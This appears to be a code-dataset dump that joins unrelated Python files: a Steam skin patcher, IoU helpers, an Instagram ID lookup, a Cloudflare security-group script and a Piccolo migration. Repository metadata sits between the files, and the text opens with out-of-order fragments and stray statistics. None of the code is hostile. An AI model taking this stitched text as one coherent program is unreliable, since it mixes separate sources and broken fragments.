return [tuple(bytes.fromhex(color.strip("#"))) for color in hexColors]
##########################
# checkInstall functions #
##########################
if __name__ == '__main__':
main()
| 33.491018 | 181 | 0.630312 | #!/usr/bin/env python3
"""
Wal Steam
========================================
oooo oooo .
`888 .8P' .o8
888 d8' .ooooo. .o888oo .oooo.
88888[ d88' `88b 888 `P )88b
888`88b. 888 888 888 .oP"888
888 `88b. 888 888 888 . d8( 888
o888o o888o `Y8bod8P' "888" `Y888""8o
@nilsu.org
=== Copyright (C) 2019 Dakota Walsh ===
"""
import shutil # copying files
import os # getting paths
import urllib.request # downloading the zip files
import zipfile # extracting the zip files
import sys
import argparse # argument parsing
import textwrap
import time
import re
from distutils.dir_util import copy_tree # copytree from shutil is broken so use copy_tree
from argparse import RawTextHelpFormatter
# set some variables for the file locations
HOME_DIR = os.getenv("HOME", os.getenv("USERPROFILE")) # should be crossplatform
CACHE_DIR = os.path.join(HOME_DIR, ".cache", "wal_steam")
CONFIG_DIR = os.path.join(HOME_DIR, ".config", "wal_steam")
SKIN_VERSION = "4.4"
SKIN_NAME = "Metro %s Wal_Mod" % SKIN_VERSION
VERSION = "1.4"
CONFIG_FILE = "wal_steam.conf"
COLORS_FILE = os.path.join(CACHE_DIR, "custom.styles")
CONFIG_URL = "https://raw.githubusercontent.com/kotajacob/wal_steam_config/master/wal_steam.conf"
STEAM_DIR_OTHER = os.path.expanduser("~/.steam/steam/skins")
STEAM_DIR_OSX = os.path.expanduser("~/Library/Application Support/Steam/Steam.AppBundle/Steam/Contents/MacOS/skins")
STEAM_DIR_UBUNTU = os.path.expanduser("~/.steam/skins")
STEAM_DIR_WINDOWS = "C:\Program Files (x86)\Steam\skins"
WAL_COLORS = os.path.join(HOME_DIR, ".cache", "wal", "colors.css")
WPG_COLORS = os.path.join(HOME_DIR, ".config", "wpg", "formats", "colors.css")
METRO_URL = "https://github.com/minischetti/metro-for-steam/archive/v%s.zip" % SKIN_VERSION
METRO_ZIP = os.path.join(CACHE_DIR, "metroZip.zip")
METRO_DIR = os.path.join(CACHE_DIR, "metro-for-steam-%s" % SKIN_VERSION)
METRO_COLORS_FILE = os.path.join(METRO_DIR, "custom.styles")
METRO_PATCH_URL = "https://github.com/redsigma/UPMetroSkin/archive/9.1.12.zip" # A link to the version we've tested rather than the latest, just in case they break things upstream.
METRO_PATCH_ZIP = os.path.join(CACHE_DIR, "metroPatchZip.zip")
METRO_PATCH_DIR = os.path.join(CACHE_DIR, "metroPatchZip")
METRO_PATCH_COPY = os.path.join(METRO_PATCH_DIR, "UPMetroSkin-9.1.12", "Unofficial 4.x Patch", "Main Files [Install First]")
METRO_PATCH_HDPI = os.path.join(METRO_PATCH_DIR, "UPMetroSkin-9.1.12", "Unofficial 4.x Patch", "Extras", "High DPI", "Increased fonts", "Install")
MAX_PATCH_DL_ATTEMPTS = 5
# CLI colour and style sequences
CLI_RED = "\033[91m"
CLI_YELLOW = "\033[93m"
CLI_BOLD = "\033[1m"
CLI_END = "\033[0m"
def tupToPrint(tup):
tmp = ' '.join(map(str, tup)) # convert the tupple (rgb color) to a string ready to print
return tmp
def setCustomStyles(colors, variables, walColors, alpha, steam_dir, fonts = []):
print ("Patching new colors")
# delete the old colors file if present in cache
try:
os.remove(COLORS_FILE) # just in case it was already there for some reason
except FileNotFoundError:
print("No file to remove")
with open(METRO_COLORS_FILE) as f:
custom_styles = f.read()
patches = []
ii = 0
for ii, i in enumerate(variables):
patches.append(
'{}="{} {}"'.format(i, tupToPrint(colors[int(walColors[ii])]), alpha[ii])
)
wal_styles = "\n".join(patches)
custom_styles = custom_styles.replace(
"}\n\nstyles{", wal_styles + "}\n\nstyles{")
if fonts:
custom_styles = replaceFonts(custom_styles, fonts)
with open(COLORS_FILE, "w") as f:
f.write(custom_styles)
# now copy it to the proper place based on the os
shutil.copy(COLORS_FILE, os.path.join(steam_dir, SKIN_NAME))
# cleanup by removing generated color files
os.remove(COLORS_FILE)
print(
"Wal colors are now patched and ready to go\n"
"If this is your first run you may have to\n"
"enable Metro Wal Mod skin in steam then\n"
"simply restart steam!"
)
def replaceFonts(styles, fonts):
print("Patching custom fonts")
# attempt to replace font styles with regular expressions
matches = {
"^basefont=\"(.+?)\"": "basefont=\"" + fonts[0] + "\"",
"^semibold=\"(.+?)\"": "semibold=\"" + fonts[1] + "\"",
"^semilight=\"(.+?)\"": "semilight=\"" + fonts[2] + "\"",
"^light=\"(.+?)\"": "light=\"" + fonts[3] + "\"",
}
for pattern, replacement in matches.items():
styles = re.sub(pattern, replacement, styles, 0, re.M)
return styles
###################
# color functions #
###################
def getConfigAlpha():
# read the config file and return a dictionary of the variables and color variables
with open(os.path.join(CONFIG_DIR, CONFIG_FILE)) as f:
# save the lines of the config file to rawFile
rawFile = f.readlines()
# loop through rawFile
result = []
for line in rawFile:
tmpResult = line[line.find(",")+1:line.find("\n")]
result.append(tmpResult)
return result
def getConfigColor():
# read the config file and return a dictionary of the variables and color variables
with open(os.path.join(CONFIG_DIR, CONFIG_FILE)) as f:
# save the lines of the config file to rawFile
rawFile = f.readlines()
# loop through rawFile
result = []
for line in rawFile:
tmpResult = line[line.find("=")+1:line.find(",")]
result.append(tmpResult)
return result
def getConfigVar():
# read the config file and return a dictionary of the variables and color variables
with open(os.path.join(CONFIG_DIR, CONFIG_FILE)) as f:
# save the lines of the config file to rawFile
rawFile = f.readlines()
# loop through rawFile
result = []
for line in rawFile:
tmpResult = line[:line.find("=")]
result.append(tmpResult)
f.close()
return result
def hexToRgb(hexColors):
"""Convert hex colors to rgb colors (takes a list)."""
return [tuple(bytes.fromhex(color.strip("#"))) for color in hexColors]
def getColors(mode):
if (mode == 0):
# using colors from wal
colorsFile = WAL_COLORS
else:
# using colors from wpg
colorsFile = WPG_COLORS
# parse the file
print("Reading colors")
try:
with open(colorsFile) as f:
rawFile = f.readlines() # save the lines to rawFile
except:
print("Error: Colors file missing. Make sure you've run pywal/wpg before wal_steam")
sys.exit(1)
# delete the lines not involving the colors
del rawFile[0:11]
del rawFile[16]
# loop through rawFile and store colors in a list
colors = []
for line in rawFile:
# delete everything but the hex code
tmp = line[line.find("#"):]
tmp = tmp[:7]
# append the hex code to the colors list
colors.append(tmp)
return colors
##########################
# checkInstall functions #
##########################
def checkSkin(steam_dir, dpi):
# check for skin and patch in cache
if not (os.path.isdir(METRO_DIR) and os.path.isdir(METRO_PATCH_COPY)):
# metro skin and patch not found in cache, download and make
makeSkin()
# check for patched skin in steam skin directory
if not os.path.isdir(os.path.join(steam_dir, SKIN_NAME)):
# patched skin not found in steam, copy it over
print("Installing skin")
copy_tree(METRO_DIR, os.path.join(steam_dir, SKIN_NAME))
else:
print("Wal Steam skin found")
if (dpi==1):
# skin was not found, copy it over
print("Forcing skin install for High DPI patches")
copy_tree(METRO_DIR, os.path.join(steam_dir, SKIN_NAME))
def makeSkin():
# download metro for steam and extract
print("Downloading Metro for steam")
try:
opener = urllib.request.build_opener()
opener.addheaders = [{'User-Agent', 'Mozilla/5.0'}]
urllib.request.install_opener(opener)
urllib.request.urlretrieve(METRO_URL, METRO_ZIP)
except:
print("Error: downloading needed skin file. Check your connection and try again.")
sys.exit(1)
with zipfile.ZipFile(METRO_ZIP, 'r') as z:
z.extractall(CACHE_DIR)
# download metro for steam patch and extract
print("Attempting to download Metro patch")
patch_dl_attempts = 0
patch_dld = False
while (patch_dl_attempts < MAX_PATCH_DL_ATTEMPTS) and not patch_dld:
try:
opener = urllib.request.build_opener()
urllib.request.install_opener(opener)
urllib.request.urlretrieve(METRO_PATCH_URL, METRO_PATCH_ZIP)
patch_dld = True
except:
patch_dl_attempts += 1
print("Error: download attempt " + str(patch_dl_attempts) + " failed.")
if patch_dl_attempts < MAX_PATCH_DL_ATTEMPTS:
time.sleep(5)
if not patch_dld:
print("Error: patch download attempts failed, exiting...")
sys.exit(1)
else:
print("Patch downloaded, proceeding...")
with zipfile.ZipFile(METRO_PATCH_ZIP, 'r') as z:
z.extractall(METRO_PATCH_DIR)
# finally apply the patch
copy_tree(METRO_PATCH_COPY, METRO_DIR) # use copy_tree not copytree, shutil copytree is broken
def makeConfig():
# download the config for wal_steam
print ("Downloading config file")
try:
urllib.request.urlretrieve(CONFIG_URL, os.path.join(CONFIG_DIR, CONFIG_FILE))
except:
# problem with download
# generate the config instead
print("Error: downloading needed config file.")
sys.exit(1)
def makeDpi():
# apply the high dpi
print ("Applying the high dpi patches")
copy_tree(METRO_PATCH_HDPI, METRO_DIR)
def delConfig():
# delete the config
if os.path.isdir(CONFIG_DIR):
shutil.rmtree(CONFIG_DIR)
def delCache():
# delete the cache
if os.path.isdir(CACHE_DIR):
shutil.rmtree(CACHE_DIR)
def delSkin(steam_dir):
# delete the skin
if os.path.isdir(os.path.join(steam_dir, SKIN_NAME)):
shutil.rmtree(os.path.join(steam_dir, SKIN_NAME))
def checkConfig():
# check for the config
if not os.path.isdir(os.path.join(HOME_DIR, ".config")):
# make the .config folder
os.mkdir(os.path.join(HOME_DIR, ".config"))
if not os.path.isdir(CONFIG_DIR):
# make the config directory
os.mkdir(CONFIG_DIR)
# download or make config file
makeConfig()
elif not os.path.isfile(os.path.join(CONFIG_DIR, CONFIG_FILE)):
# download or make the config file
makeConfig()
else:
# config file found!
print("Wal Steam config found")
def checkCache(dpi):
# check for the cache
if not os.path.isdir(os.path.join(HOME_DIR, ".cache")):
# make the .cache folder
os.mkdir(os.path.join(HOME_DIR, ".cache"))
if not os.path.isdir(CACHE_DIR):
# make the cache directory
os.mkdir(CACHE_DIR)
# download, extract, and patch metro for steam
makeSkin()
# apply the dpi patches
if (dpi==1):
makeDpi()
else:
# cache folder exists
print("Wal Steam cache found")
# apply the dpi patches
if (dpi==1):
makeDpi()
def checkInstall(oSys, dpi):
# check if the cache exists, make it if not
checkCache(dpi)
# check if the config file exists
checkConfig()
# check if the skin is installed, install it if not
checkSkin(oSys, dpi)
def forceUpdate(oSys, dpi):
# force update the cache and config files
delConfig()
delCache()
delSkin(oSys)
checkCache(dpi)
checkConfig()
def getOs():
# check if ~/.steam/steam/skins exists
if os.path.isdir(STEAM_DIR_OTHER):
return STEAM_DIR_OTHER
# check if ~/.steam/skins exists
elif os.path.isdir(STEAM_DIR_UBUNTU):
return STEAM_DIR_UBUNTU
# check if C:\Program Files (x86)\Steam\skins exists
elif os.path.isdir(STEAM_DIR_WINDOWS):
return STEAM_DIR_WINDOWS
elif os.path.isdir(STEAM_DIR_OSX):
return STEAM_DIR_OSX
# close with error message otherwise
else:
print("Error: Steam install not found!")
sys.exit(1)
def parseFontArgs(rawArgs):
splitArgs = [arg.strip() for arg in rawArgs.split(",")]
if len(splitArgs) != 4:
print("Error: You must specify all four custom font styles.")
sys.exit(1)
return splitArgs
def getArgs():
# get the arguments with argparse
description = "Wal Steam"
arg = argparse.ArgumentParser(description=description, formatter_class=RawTextHelpFormatter)
arg.add_argument("-v", "--version", action="store_true",
help="Print wal_steam version.")
arg.add_argument("-w", action="store_true",
help="Get colors from wal.")
arg.add_argument("-g", action="store_true",
help="Get colors from wpg.")
arg.add_argument("-s",
help="Enter a custom steam skin directory.")
arg.add_argument("-d", action="store_true",
help="Apply high dpi patches.")
arg.add_argument("-u", action="store_true",
help=f"Force update cache, skin, and config file. {CLI_RED}WARNING:{CLI_END} WILL OVERWRITE config.json")
arg.add_argument("-f", "--fonts",
help=textwrap.dedent(f'''
Specify custom fonts. Enter font styles separated by comma.
{CLI_BOLD}Available styles:{CLI_END} basefont, semibold, semilight, light.
{CLI_YELLOW}Example:{CLI_END} 'Open Sans, Open Sans Semibold, Open Sans Semilight, Open Sans Light'
{CLI_RED}WARNING:{CLI_END} Fonts must already be installed on your system.'''))
arg.add_argument("-a", "--attempts", help="Set the number of patch download attempts (DEFAULT=5)")
return arg.parse_args()
def main():
# set default mode to wal
# 0 = wal
# 1 = wpgtk
mode = 0
# parse the arguments
arguments = getArgs()
if arguments.version:
print("Wal Steam", VERSION)
sys.exit()
# make sure they didn't select both wal and wpg
if arguments.w and arguments.g:
print("Error: You must select wpg or wal")
sys.exit(1)
# set the mode for either wal or wpg
if arguments.w:
mode = 0
if arguments.g:
mode = 1
# check if user wants high-dpi support
if arguments.d:
dpi = 1
if not arguments.d:
dpi = 0
# allow the user to enter a custom steam install location
if arguments.s:
oSys = arguments.s
print("Using custom skin path: {}".format(arguments.s))
else:
# check where the os installed steam
# ~/.steam/steam/skins - common linux install location
# ~/.steam/skins - used on ubuntu and its derivatives
# C:\Program Files (x86)\Steam\skins - used on windows
oSys = getOs()
# allow the user to enter custom font styles
if arguments.fonts:
fonts = parseFontArgs(arguments.fonts)
print("Using custom font styles: {}".format(arguments.fonts))
else:
fonts = ""
# update the cache and config then exit
if arguments.u:
print("Force updating cache and config")
# first remove the cache and config
forceUpdate(oSys, dpi)
print("Cache and config updated")
print("Run with -w or -g to apply and re-enable wal_steam")
sys.exit()
if arguments.attempts:
try:
attempts_bound = int(arguments.attempts)
MAX_PATCH_DL_ATTEMPTS = attempts_bound
except:
print("Error setting maximum patch download attempts, using default (5).")
# check for the cache, the skin, and get them if needed
checkInstall(oSys, dpi)
# get a list from either wal or wpg based on the mode
colors = getColors(mode)
# convert our list of colors from hex to rgb
colors = hexToRgb(colors)
# get a dictionary of the config settings from the config file
variables = getConfigVar()
walColors = getConfigColor()
alpha = getConfigAlpha()
# finally create a temp colors.styles and copy it in updating the skin
setCustomStyles(colors, variables, walColors, alpha, oSys, fonts)
if __name__ == '__main__':
main()
| 12,920 | 0 | 505 |
2ccfa7cbd536230e887665371eaf8ff4ae36b4f9 | 200 | py | Python | utils/network.py | buckyroberts/Discord-Python-Framework | 8731e9a01c2e2f83af9882838ad809696fe89e22 | [
"MIT"
] | 10 | 2021-10-04T01:21:51.000Z | 2021-11-17T09:26:17.000Z | utils/network.py | buckyroberts/Discord-Python-Framework | 8731e9a01c2e2f83af9882838ad809696fe89e22 | [
"MIT"
] | 1 | 2021-10-04T01:38:15.000Z | 2021-10-04T01:38:15.000Z | utils/network.py | buckyroberts/Discord-Python-Framework | 8731e9a01c2e2f83af9882838ad809696fe89e22 | [
"MIT"
] | 2 | 2021-11-20T14:41:56.000Z | 2022-02-09T18:49:29.000Z | import requests
def fetch(*, url, headers):
"""
Send a GET request and return response as Python object
"""
response = requests.get(url, headers=headers)
return response.json()
| 18.181818 | 59 | 0.66 | import requests
def fetch(*, url, headers):
"""
Send a GET request and return response as Python object
"""
response = requests.get(url, headers=headers)
return response.json()
| 0 | 0 | 0 |
49792b33f19afed9efddc9395343ced3da2f19b6 | 2,942 | py | Python | predict/helper.py | xjh19971/Autodetection | b88a320d23d943d391d90603ae18369d89bc8385 | [
"MIT"
] | 2 | 2020-06-04T20:41:30.000Z | 2021-07-01T21:28:06.000Z | predict/helper.py | xjh19971/Autodetection | b88a320d23d943d391d90603ae18369d89bc8385 | [
"MIT"
] | null | null | null | predict/helper.py | xjh19971/Autodetection | b88a320d23d943d391d90603ae18369d89bc8385 | [
"MIT"
] | null | null | null | import torch
from shapely.geometry import Polygon
| 33.816092 | 108 | 0.646839 | import torch
from shapely.geometry import Polygon
def convert_map_to_lane_map(ego_map, binary_lane):
mask = (ego_map[0, :, :] == ego_map[1, :, :]) * (ego_map[1, :, :] == ego_map[2, :, :]) + (
ego_map[0, :, :] == 250 / 255)
if binary_lane:
return (~ mask)
return ego_map * (~ mask.view(1, ego_map.shape[1], ego_map.shape[2]))
def convert_map_to_road_map(ego_map):
mask = (ego_map[0, :, :] == 1) * (ego_map[1, :, :] == 1) * (ego_map[2, :, :] == 1)
return (~mask)
def collate_fn(batch):
return tuple(zip(*batch))
def draw_box(ax, corners, color):
point_squence = torch.stack([corners[:, 0], corners[:, 1], corners[:, 3], corners[:, 2], corners[:, 0]])
# the corners are in meter and time 10 will convert them in pixels
# Add 400, since the center of the image is at pixel (400, 400)
# The negative sign is because the y axis is reversed for matplotlib
ax.plot(point_squence.T[0] * 10 + 400, -point_squence.T[1] * 10 + 400, color=color)
def compute_ats_bounding_boxes(boxes1, boxes2):
num_boxes1 = boxes1.size(0)
num_boxes2 = boxes2.size(0)
boxes1_max_x = boxes1[:, 0].max(dim=1)[0]
boxes1_min_x = boxes1[:, 0].min(dim=1)[0]
boxes1_max_y = boxes1[:, 1].max(dim=1)[0]
boxes1_min_y = boxes1[:, 1].min(dim=1)[0]
boxes2_max_x = boxes2[:, 0].max(dim=1)[0]
boxes2_min_x = boxes2[:, 0].min(dim=1)[0]
boxes2_max_y = boxes2[:, 1].max(dim=1)[0]
boxes2_min_y = boxes2[:, 1].min(dim=1)[0]
condition1_matrix = (boxes1_max_x.unsqueeze(1) > boxes2_min_x.unsqueeze(0))
condition2_matrix = (boxes1_min_x.unsqueeze(1) < boxes2_max_x.unsqueeze(0))
condition3_matrix = (boxes1_max_y.unsqueeze(1) > boxes2_min_y.unsqueeze(0))
condition4_matrix = (boxes1_min_y.unsqueeze(1) < boxes2_max_y.unsqueeze(0))
condition_matrix = condition1_matrix * condition2_matrix * condition3_matrix * condition4_matrix
iou_matrix = torch.zeros(num_boxes1, num_boxes2)
for i in range(num_boxes1):
for j in range(num_boxes2):
if condition_matrix[i][j]:
iou_matrix[i][j] = compute_iou(boxes1[i], boxes2[j])
iou_max = iou_matrix.max(dim=0)[0]
iou_thresholds = [0.5, 0.6, 0.7, 0.8, 0.9]
total_threat_score = 0
total_weight = 0
for threshold in iou_thresholds:
tp = (iou_max > threshold).sum()
threat_score = tp * 1.0 / (num_boxes1 + num_boxes2 - tp)
total_threat_score += 1.0 / threshold * threat_score
total_weight += 1.0 / threshold
average_threat_score = total_threat_score / total_weight
return average_threat_score
def compute_ts_road_map(road_map1, road_map2):
tp = (road_map1 * road_map2).sum()
return tp * 1.0 / (road_map1.sum() + road_map2.sum() - tp)
def compute_iou(box1, box2):
a = Polygon(torch.t(box1)).convex_hull
b = Polygon(torch.t(box2)).convex_hull
return a.intersection(b).area / a.union(b).area
| 2,723 | 0 | 161 |
3da24ba73dbb35056c554b2c9b424a1f2befb527 | 1,453 | py | Python | run_scripts/gds_import.py | zhaokai-l/bag | a496368ad8fc92ff0f5bf3bfb4ebaa45c540a104 | [
"Apache-2.0",
"BSD-3-Clause"
] | 32 | 2019-05-16T19:25:00.000Z | 2021-12-07T20:12:13.000Z | run_scripts/gds_import.py | zhaokai-l/bag | a496368ad8fc92ff0f5bf3bfb4ebaa45c540a104 | [
"Apache-2.0",
"BSD-3-Clause"
] | 1 | 2021-01-07T03:08:33.000Z | 2021-01-07T03:08:33.000Z | run_scripts/gds_import.py | zhaokai-l/bag | a496368ad8fc92ff0f5bf3bfb4ebaa45c540a104 | [
"Apache-2.0",
"BSD-3-Clause"
] | 11 | 2019-07-23T17:37:48.000Z | 2021-10-19T15:24:33.000Z | # SPDX-License-Identifier: Apache-2.0
# Copyright 2019 Blue Cheetah Analog Design Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
from bag.core import BagProject
from bag.util.misc import register_pdb_hook
register_pdb_hook()
if __name__ == '__main__':
_args = parse_options()
local_dict = locals()
if 'bprj' not in local_dict:
print('creating BAG project')
_prj = BagProject()
else:
print('loading BAG project')
_prj = local_dict['bprj']
run_main(_prj, _args)
| 29.653061 | 81 | 0.722643 | # SPDX-License-Identifier: Apache-2.0
# Copyright 2019 Blue Cheetah Analog Design Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
from bag.core import BagProject
from bag.util.misc import register_pdb_hook
register_pdb_hook()
def parse_options() -> argparse.Namespace:
parser = argparse.ArgumentParser(description='Generate cell from spec file.')
parser.add_argument('fname', help='GDS file name.')
parser.add_argument('lib_name', help='layout library name.')
args = parser.parse_args()
return args
def run_main(prj: BagProject, args: argparse.Namespace) -> None:
prj.import_gds_file(args.fname, args.lib_name)
if __name__ == '__main__':
_args = parse_options()
local_dict = locals()
if 'bprj' not in local_dict:
print('creating BAG project')
_prj = BagProject()
else:
print('loading BAG project')
_prj = local_dict['bprj']
run_main(_prj, _args)
| 365 | 0 | 46 |
8f70e1a6887b98e59c86a33ce0edc6d78eddf21a | 523 | py | Python | instagram.py | abhi-s28/InstaFlask | ded93f75795d5bdcc9d9f06dac3bda094516e7cc | [
"MIT"
] | null | null | null | instagram.py | abhi-s28/InstaFlask | ded93f75795d5bdcc9d9f06dac3bda094516e7cc | [
"MIT"
] | null | null | null | instagram.py | abhi-s28/InstaFlask | ded93f75795d5bdcc9d9f06dac3bda094516e7cc | [
"MIT"
] | 1 | 2020-10-01T03:30:42.000Z | 2020-10-01T03:30:42.000Z | #!/usr/bin/env python3
import argparse
import re
import sys
import requests
| 21.791667 | 57 | 0.594646 | #!/usr/bin/env python3
import argparse
import re
import sys
import requests
def getID(username):
url = "https://www.instagram.com/{}"
r = requests.get(url.format(username))
html = r.text
if r.ok:
return re.findall('"id":"(.*?)",', html)[0]
else:
return "invalid_username"
def userDetails(userID):
url = "https://i.instagram.com/api/v1/users/{}/info/"
r = requests.get(url.format(userID))
if r.ok:
data = r.json()
return data
else:
return "NULL"
| 401 | 0 | 46 |
af41a834d1cccc2cce84e521eb37ee8cfb3a792d | 2,123 | py | Python | cloudformation/add_cloudflare_ips_to_sgs.py | juliecentofanti172/juliecentofanti.github.io | 446ea8522b9f4a6709124ebb6e0f675acf7fe205 | [
"CC0-1.0"
] | 134 | 2018-05-23T14:00:29.000Z | 2022-03-10T15:47:53.000Z | cloudformation/add_cloudflare_ips_to_sgs.py | ptrourke/concordia | 56ff364dbf38cb8a763df489479821fe43b76d69 | [
"CC0-1.0"
] | 1,104 | 2018-05-22T20:18:22.000Z | 2022-03-31T17:28:40.000Z | cloudformation/add_cloudflare_ips_to_sgs.py | ptrourke/concordia | 56ff364dbf38cb8a763df489479821fe43b76d69 | [
"CC0-1.0"
] | 32 | 2018-05-22T20:22:38.000Z | 2021-12-21T14:11:44.000Z | #!/usr/bin/env python3
"""
Ensure that every security group tagged with “AllowCloudFlareIngress” has
permissions for every public CloudFlare netblock
"""
import sys
import boto3
import requests
from botocore.exceptions import ClientError
EC2_CLIENT = boto3.client("ec2")
CLOUDFLARE_IPV4 = requests.get("https://www.cloudflare.com/ips-v4").text.splitlines()
CLOUDFLARE_IPV6 = requests.get("https://www.cloudflare.com/ips-v6").text.splitlines()
if __name__ == "__main__":
for security_group_id, existing_permissions in get_security_groups():
add_ingess_rules_for_group(security_group_id, existing_permissions)
| 30.328571 | 87 | 0.681583 | #!/usr/bin/env python3
"""
Ensure that every security group tagged with “AllowCloudFlareIngress” has
permissions for every public CloudFlare netblock
"""
import sys
import boto3
import requests
from botocore.exceptions import ClientError
EC2_CLIENT = boto3.client("ec2")
CLOUDFLARE_IPV4 = requests.get("https://www.cloudflare.com/ips-v4").text.splitlines()
CLOUDFLARE_IPV6 = requests.get("https://www.cloudflare.com/ips-v6").text.splitlines()
def add_ingess_rules_for_group(sg_id, existing_permissions):
permissions = {"IpProtocol": "tcp", "FromPort": 443, "ToPort": 443}
existing_ipv4 = set()
existing_ipv6 = set()
for existing in existing_permissions:
if any(
permissions[k] != existing[k] for k in ("IpProtocol", "FromPort", "ToPort")
):
continue
existing_ipv4.update(i["CidrIp"] for i in existing["IpRanges"])
existing_ipv6.update(i["CidrIpv6"] for i in existing["Ipv6Ranges"])
ipv4_ranges = [
{"CidrIp": cidr, "Description": "CloudFlare"}
for cidr in CLOUDFLARE_IPV4
if cidr not in existing_ipv4
]
ipv6_ranges = [
{"CidrIpv6": cidr, "Description": "CloudFlare"}
for cidr in CLOUDFLARE_IPV6
if cidr not in existing_ipv6
]
permissions["IpRanges"] = ipv4_ranges
permissions["Ipv6Ranges"] = ipv6_ranges
try:
EC2_CLIENT.authorize_security_group_ingress(
GroupId=sg_id, IpPermissions=[permissions]
)
except ClientError as exc:
print(f"Unable to add permssions for {sg_id}: {exc}", file=sys.stderr)
def get_security_groups():
paginator = EC2_CLIENT.get_paginator("describe_security_groups")
page_iterator = paginator.paginate(
Filters=[{"Name": "tag-key", "Values": ["AllowCloudFlareIngress"]}]
)
for page in page_iterator:
for sg in page["SecurityGroups"]:
yield sg["GroupId"], sg["IpPermissions"]
if __name__ == "__main__":
for security_group_id, existing_permissions in get_security_groups():
add_ingess_rules_for_group(security_group_id, existing_permissions)
| 1,449 | 0 | 46 |
8081ee348f5ac1ea91c76d0d12aed0bb2eb67a0b | 7,391 | py | Python | ads/piccolo_migrations/2020-10-04T21:27:16.py | sinisaos/starlette-piccolo-rental | c837756c7930e058ea341c67285d0c38f005b007 | [
"MIT"
] | 3 | 2020-10-08T09:37:03.000Z | 2022-03-29T04:05:42.000Z | ads/piccolo_migrations/2020-10-04T21:27:16.py | sinisaos/starlette-piccolo-rental | c837756c7930e058ea341c67285d0c38f005b007 | [
"MIT"
] | null | null | null | ads/piccolo_migrations/2020-10-04T21:27:16.py | sinisaos/starlette-piccolo-rental | c837756c7930e058ea341c67285d0c38f005b007 | [
"MIT"
] | null | null | null | from piccolo.apps.migrations.auto import MigrationManager
from piccolo.columns.base import OnDelete, OnUpdate
from piccolo.columns.defaults.timestamp import TimestampNow
from piccolo.table import Table
ID = "2020-10-04T21:27:16"
VERSION = "0.13.4"
| 25.139456 | 63 | 0.492085 | from piccolo.apps.migrations.auto import MigrationManager
from piccolo.columns.base import OnDelete, OnUpdate
from piccolo.columns.defaults.timestamp import TimestampNow
from piccolo.table import Table
class Ad(Table, tablename="ad"):
pass
class User(Table, tablename="piccolo_user"):
pass
ID = "2020-10-04T21:27:16"
VERSION = "0.13.4"
async def forwards():
manager = MigrationManager(migration_id=ID, app_name="ads")
manager.add_table("Rent", tablename="rent")
manager.add_table("Image", tablename="image")
manager.add_table("Review", tablename="review")
manager.add_table("Notification", tablename="notification")
manager.add_column(
table_class_name="Rent",
tablename="rent",
column_name="start_date",
column_class_name="Timestamp",
params={
"default": TimestampNow(),
"null": False,
"primary": False,
"key": False,
"unique": False,
"index": False,
},
)
manager.add_column(
table_class_name="Rent",
tablename="rent",
column_name="end_date",
column_class_name="Timestamp",
params={
"default": TimestampNow(),
"null": False,
"primary": False,
"key": False,
"unique": False,
"index": False,
},
)
manager.add_column(
table_class_name="Rent",
tablename="rent",
column_name="client",
column_class_name="ForeignKey",
params={
"references": User,
"on_delete": OnDelete.cascade,
"on_update": OnUpdate.cascade,
"default": None,
"null": True,
"primary": False,
"key": False,
"unique": False,
"index": False,
},
)
manager.add_column(
table_class_name="Rent",
tablename="rent",
column_name="ad_rent",
column_class_name="ForeignKey",
params={
"references": Ad,
"on_delete": OnDelete.cascade,
"on_update": OnUpdate.cascade,
"default": None,
"null": True,
"primary": False,
"key": False,
"unique": False,
"index": False,
},
)
manager.add_column(
table_class_name="Image",
tablename="image",
column_name="path",
column_class_name="Varchar",
params={
"length": 255,
"default": "",
"null": False,
"primary": False,
"key": False,
"unique": False,
"index": False,
},
)
manager.add_column(
table_class_name="Image",
tablename="image",
column_name="ad_image",
column_class_name="ForeignKey",
params={
"references": Ad,
"on_delete": OnDelete.cascade,
"on_update": OnUpdate.cascade,
"default": None,
"null": True,
"primary": False,
"key": False,
"unique": False,
"index": False,
},
)
manager.add_column(
table_class_name="Review",
tablename="review",
column_name="content",
column_class_name="Text",
params={
"default": "",
"null": False,
"primary": False,
"key": False,
"unique": False,
"index": False,
},
)
manager.add_column(
table_class_name="Review",
tablename="review",
column_name="created",
column_class_name="Timestamp",
params={
"default": TimestampNow(),
"null": False,
"primary": False,
"key": False,
"unique": False,
"index": False,
},
)
manager.add_column(
table_class_name="Review",
tablename="review",
column_name="review_grade",
column_class_name="Integer",
params={
"default": 0,
"null": False,
"primary": False,
"key": False,
"unique": False,
"index": False,
},
)
manager.add_column(
table_class_name="Review",
tablename="review",
column_name="review_user",
column_class_name="ForeignKey",
params={
"references": User,
"on_delete": OnDelete.cascade,
"on_update": OnUpdate.cascade,
"default": None,
"null": True,
"primary": False,
"key": False,
"unique": False,
"index": False,
},
)
manager.add_column(
table_class_name="Review",
tablename="review",
column_name="ad",
column_class_name="ForeignKey",
params={
"references": Ad,
"on_delete": OnDelete.cascade,
"on_update": OnUpdate.cascade,
"default": None,
"null": True,
"primary": False,
"key": False,
"unique": False,
"index": False,
},
)
manager.add_column(
table_class_name="Notification",
tablename="notification",
column_name="message",
column_class_name="Varchar",
params={
"length": 150,
"default": "",
"null": False,
"primary": False,
"key": False,
"unique": False,
"index": False,
},
)
manager.add_column(
table_class_name="Notification",
tablename="notification",
column_name="created",
column_class_name="Timestamp",
params={
"default": TimestampNow(),
"null": False,
"primary": False,
"key": False,
"unique": False,
"index": False,
},
)
manager.add_column(
table_class_name="Notification",
tablename="notification",
column_name="is_read",
column_class_name="Boolean",
params={
"default": False,
"null": False,
"primary": False,
"key": False,
"unique": False,
"index": False,
},
)
manager.add_column(
table_class_name="Notification",
tablename="notification",
column_name="sender",
column_class_name="ForeignKey",
params={
"references": User,
"on_delete": OnDelete.cascade,
"on_update": OnUpdate.cascade,
"default": None,
"null": True,
"primary": False,
"key": False,
"unique": False,
"index": False,
},
)
